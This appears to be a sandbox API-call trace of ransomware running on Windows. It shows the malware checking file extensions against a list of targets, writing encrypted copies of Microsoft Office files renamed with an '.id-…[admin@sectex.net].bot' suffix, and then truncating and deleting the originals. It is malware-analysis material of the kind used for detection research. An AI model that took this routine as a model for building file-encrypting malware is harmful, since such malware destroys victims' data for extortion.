	[0153.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_F_COL.HXK") returned 65
	[0153.719] lstrlenW (lpString=".doc") returned 4
	[0153.719] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0153.719] lstrlenW (lpString=".docx") returned 5
	[0153.719] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0153.719] lstrlenW (lpString=".pdf") returned 4
	[0153.720] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0153.720] lstrlenW (lpString=".xls") returned 4
	[0153.720] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0153.720] lstrlenW (lpString=".xlsx") returned 5
	[0153.720] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0153.720] lstrlenW (lpString=".ppt") returned 4
	[0153.720] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0153.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_F_COL.HXK") returned 65
	[0153.720] lstrlenW (lpString=".zip") returned 4
	[0153.720] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0153.720] lstrlenW (lpString=".rar") returned 4
	[0153.720] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0153.720] lstrlenW (lpString=".bz2") returned 4
	[0153.720] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0153.720] lstrlenW (lpString=".7z") returned 3
	[0153.720] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0153.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_F_COL.HXK") returned 65
	[0153.720] lstrlenW (lpString=".dbf") returned 4
	[0153.720] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0153.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_F_COL.HXK") returned 65
	[0153.720] lstrlenW (lpString=".1cd") returned 4
	[0153.720] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0153.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_F_COL.HXK") returned 65
	[0153.720] lstrlenW (lpString=".jpg") returned 4
	[0153.720] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0153.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_F_COL.HXK") returned 65
	[0153.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_F_COL.HXK") returned 65
	[0153.720] lstrlenW (lpString=".doc") returned 4
	[0153.720] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0153.720] lstrlenW (lpString=".docx") returned 5
	[0153.721] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0153.721] lstrlenW (lpString=".pdf") returned 4
	[0153.721] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0153.721] lstrlenW (lpString=".xls") returned 4
	[0153.721] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0153.721] lstrlenW (lpString=".xlsx") returned 5
	[0153.721] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0153.721] lstrlenW (lpString=".ppt") returned 4
	[0153.721] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0153.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_F_COL.HXK") returned 65
	[0153.721] lstrlenW (lpString=".zip") returned 4
	[0153.721] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0153.721] lstrlenW (lpString=".rar") returned 4
	[0153.721] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0153.721] lstrlenW (lpString=".bz2") returned 4
	[0153.721] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0153.721] lstrlenW (lpString=".7z") returned 3
	[0153.721] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0153.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_F_COL.HXK") returned 65
	[0153.721] lstrlenW (lpString=".dbf") returned 4
	[0153.721] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0153.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_F_COL.HXK") returned 65
	[0153.721] lstrlenW (lpString=".1cd") returned 4
	[0153.721] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0153.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_F_COL.HXK") returned 65
	[0153.721] lstrlenW (lpString=".jpg") returned 4
	[0153.721] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0153.722] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0153.722] lstrlenW (lpString="WINPROJ_K_COL.HXK") returned 17
	[0153.722] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0153.722] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=113) returned 1
	[0153.722] CloseHandle (hObject=0x3dc) returned 1
	[0153.722] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_k_col.hxk")) returned 0x20
	[0153.722] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.722] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0153.723] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.723] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.723] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0153.723] GetLastError () returned 0x0
	[0153.723] ReadFile (in: hFile=0x3dc, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x71, lpOverlapped=0x0) returned 1
	[0153.724] WriteFile (in: hFile=0x2a0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x80, lpOverlapped=0x0) returned 1
	[0153.725] ReadFile (in: hFile=0x3dc, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.725] WriteFile (in: hFile=0x2a0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xf6, lpOverlapped=0x0) returned 1
	[0153.725] SetEndOfFile (hFile=0x2a0) returned 1
	[0153.725] CloseHandle (hObject=0x2a0) returned 1
	[0153.725] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.725] SetEndOfFile (hFile=0x3dc) returned 1
	[0153.728] CloseHandle (hObject=0x3dc) returned 1
	[0153.728] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.728] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_k_col.hxk")) returned 1
	[0153.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_K_COL.HXK") returned 65
	[0153.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_K_COL.HXK") returned 65
	[0153.729] lstrlenW (lpString=".doc") returned 4
	[0153.729] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0153.729] lstrlenW (lpString=".docx") returned 5
	[0153.729] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0153.729] lstrlenW (lpString=".pdf") returned 4
	[0153.729] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0153.729] lstrlenW (lpString=".xls") returned 4
	[0153.729] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0153.729] lstrlenW (lpString=".xlsx") returned 5
	[0153.729] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0153.729] lstrlenW (lpString=".ppt") returned 4
	[0153.729] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0153.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_K_COL.HXK") returned 65
	[0153.729] lstrlenW (lpString=".zip") returned 4
	[0153.729] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0153.729] lstrlenW (lpString=".rar") returned 4
	[0153.729] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0153.729] lstrlenW (lpString=".bz2") returned 4
	[0153.729] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0153.730] lstrlenW (lpString=".7z") returned 3
	[0153.730] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0153.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_K_COL.HXK") returned 65
	[0153.730] lstrlenW (lpString=".dbf") returned 4
	[0153.730] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0153.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_K_COL.HXK") returned 65
	[0153.730] lstrlenW (lpString=".1cd") returned 4
	[0153.730] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0153.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_K_COL.HXK") returned 65
	[0153.730] lstrlenW (lpString=".jpg") returned 4
	[0153.730] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0153.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_K_COL.HXK") returned 65
	[0153.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_K_COL.HXK") returned 65
	[0153.730] lstrlenW (lpString=".doc") returned 4
	[0153.730] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0153.730] lstrlenW (lpString=".docx") returned 5
	[0153.730] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0153.730] lstrlenW (lpString=".pdf") returned 4
	[0153.730] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0153.731] lstrlenW (lpString=".xls") returned 4
	[0153.731] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0153.731] lstrlenW (lpString=".xlsx") returned 5
	[0153.731] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0153.731] lstrlenW (lpString=".ppt") returned 4
	[0153.731] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0153.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_K_COL.HXK") returned 65
	[0153.731] lstrlenW (lpString=".zip") returned 4
	[0153.731] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0153.731] lstrlenW (lpString=".rar") returned 4
	[0153.731] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0153.731] lstrlenW (lpString=".bz2") returned 4
	[0153.731] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0153.731] lstrlenW (lpString=".7z") returned 3
	[0153.731] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0153.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_K_COL.HXK") returned 65
	[0153.731] lstrlenW (lpString=".dbf") returned 4
	[0153.731] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0153.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_K_COL.HXK") returned 65
	[0153.731] lstrlenW (lpString=".1cd") returned 4
	[0153.731] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0153.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_K_COL.HXK") returned 65
	[0153.731] lstrlenW (lpString=".jpg") returned 4
	[0153.731] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0153.731] lstrcmpiW (lpString1=".VRD", lpString2=".bot") returned 1
	[0153.731] lstrlenW (lpString="WINSCHD.VRD") returned 11
	[0153.732] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINSCHD.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winschd.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0153.733] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=1544) returned 1
	[0153.733] CloseHandle (hObject=0x3dc) returned 1
	[0153.733] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINSCHD.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winschd.vrd")) returned 0x20
	[0153.733] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINSCHD.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winschd.vrd.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.733] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINSCHD.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winschd.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0153.733] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.733] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.733] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINSCHD.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winschd.vrd.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0153.734] GetLastError () returned 0x0
	[0153.734] ReadFile (in: hFile=0x3dc, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x608, lpOverlapped=0x0) returned 1
	[0153.738] WriteFile (in: hFile=0x2a0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x610, lpOverlapped=0x0) returned 1
	[0153.739] ReadFile (in: hFile=0x3dc, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.739] WriteFile (in: hFile=0x2a0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0153.739] SetEndOfFile (hFile=0x2a0) returned 1
	[0153.739] CloseHandle (hObject=0x2a0) returned 1
	[0153.739] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.739] SetEndOfFile (hFile=0x3dc) returned 1
	[0153.741] CloseHandle (hObject=0x3dc) returned 1
	[0153.741] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINSCHD.VRD.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.741] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINSCHD.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winschd.vrd")) returned 1
	[0153.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINSCHD.VRD") returned 59
	[0153.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINSCHD.VRD") returned 59
	[0153.742] lstrlenW (lpString=".doc") returned 4
	[0153.742] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0153.742] lstrlenW (lpString=".docx") returned 5
	[0153.742] lstrcmpiW (lpString1=".docx", lpString2="D.VRD") returned -1
	[0153.742] lstrlenW (lpString=".pdf") returned 4
	[0153.742] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0153.742] lstrlenW (lpString=".xls") returned 4
	[0153.742] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0153.742] lstrlenW (lpString=".xlsx") returned 5
	[0153.742] lstrcmpiW (lpString1=".xlsx", lpString2="D.VRD") returned -1
	[0153.742] lstrlenW (lpString=".ppt") returned 4
	[0153.742] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0153.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINSCHD.VRD") returned 59
	[0153.742] lstrlenW (lpString=".zip") returned 4
	[0153.742] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0153.742] lstrlenW (lpString=".rar") returned 4
	[0153.742] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0153.742] lstrlenW (lpString=".bz2") returned 4
	[0153.743] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0153.743] lstrlenW (lpString=".7z") returned 3
	[0153.743] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0153.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINSCHD.VRD") returned 59
	[0153.743] lstrlenW (lpString=".dbf") returned 4
	[0153.743] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0153.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINSCHD.VRD") returned 59
	[0153.743] lstrlenW (lpString=".1cd") returned 4
	[0153.743] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0153.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINSCHD.VRD") returned 59
	[0153.743] lstrlenW (lpString=".jpg") returned 4
	[0153.743] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0153.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINSCHD.VRD") returned 59
	[0153.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINSCHD.VRD") returned 59
	[0153.743] lstrlenW (lpString=".doc") returned 4
	[0153.743] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0153.743] lstrlenW (lpString=".docx") returned 5
	[0153.743] lstrcmpiW (lpString1=".docx", lpString2="D.VRD") returned -1
	[0153.743] lstrlenW (lpString=".pdf") returned 4
	[0153.743] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0153.743] lstrlenW (lpString=".xls") returned 4
	[0153.743] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0153.743] lstrlenW (lpString=".xlsx") returned 5
	[0153.743] lstrcmpiW (lpString1=".xlsx", lpString2="D.VRD") returned -1
	[0153.743] lstrlenW (lpString=".ppt") returned 4
	[0153.743] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0153.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINSCHD.VRD") returned 59
	[0153.743] lstrlenW (lpString=".zip") returned 4
	[0153.743] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0153.744] lstrlenW (lpString=".rar") returned 4
	[0153.744] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0153.744] lstrlenW (lpString=".bz2") returned 4
	[0153.744] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0153.744] lstrlenW (lpString=".7z") returned 3
	[0153.744] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0153.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINSCHD.VRD") returned 59
	[0153.744] lstrlenW (lpString=".dbf") returned 4
	[0153.744] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0153.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINSCHD.VRD") returned 59
	[0153.744] lstrlenW (lpString=".1cd") returned 4
	[0153.744] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0153.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINSCHD.VRD") returned 59
	[0153.744] lstrlenW (lpString=".jpg") returned 4
	[0153.744] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0153.744] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0153.744] lstrlenW (lpString="WINWORD.DEV.HXS") returned 15
	[0153.744] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0153.745] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=7438482) returned 1
	[0153.745] CloseHandle (hObject=0x3dc) returned 1
	[0153.745] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev.hxs")) returned 0x20
	[0153.745] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.745] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0153.745] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV.HXS") returned 63
	[0153.745] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV.HXS") returned 63
	[0153.745] lstrlenW (lpString=".doc") returned 4
	[0153.745] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0153.745] lstrlenW (lpString=".docx") returned 5
	[0153.745] lstrcmpiW (lpString1=".docx", lpString2="V.HXS") returned -1
	[0153.746] lstrlenW (lpString=".pdf") returned 4
	[0153.746] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0153.746] lstrlenW (lpString=".xls") returned 4
	[0153.746] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0153.746] lstrlenW (lpString=".xlsx") returned 5
	[0153.746] lstrcmpiW (lpString1=".xlsx", lpString2="V.HXS") returned -1
	[0153.746] lstrlenW (lpString=".ppt") returned 4
	[0153.746] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0153.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV.HXS") returned 63
	[0153.746] lstrlenW (lpString=".zip") returned 4
	[0153.746] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0153.746] lstrlenW (lpString=".rar") returned 4
	[0153.746] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0153.746] lstrlenW (lpString=".bz2") returned 4
	[0153.746] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0153.746] lstrlenW (lpString=".7z") returned 3
	[0153.746] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0153.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV.HXS") returned 63
	[0153.746] lstrlenW (lpString=".dbf") returned 4
	[0153.746] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0153.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV.HXS") returned 63
	[0153.746] lstrlenW (lpString=".1cd") returned 4
	[0153.746] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0153.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV.HXS") returned 63
	[0153.746] lstrlenW (lpString=".jpg") returned 4
	[0153.746] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0153.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV.HXS") returned 63
	[0153.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV.HXS") returned 63
	[0153.747] lstrlenW (lpString=".doc") returned 4
	[0153.747] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0153.747] lstrlenW (lpString=".docx") returned 5
	[0153.747] lstrcmpiW (lpString1=".docx", lpString2="V.HXS") returned -1
	[0153.747] lstrlenW (lpString=".pdf") returned 4
	[0153.747] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0153.747] lstrlenW (lpString=".xls") returned 4
	[0153.747] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0153.747] lstrlenW (lpString=".xlsx") returned 5
	[0153.747] lstrcmpiW (lpString1=".xlsx", lpString2="V.HXS") returned -1
	[0153.747] lstrlenW (lpString=".ppt") returned 4
	[0153.747] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
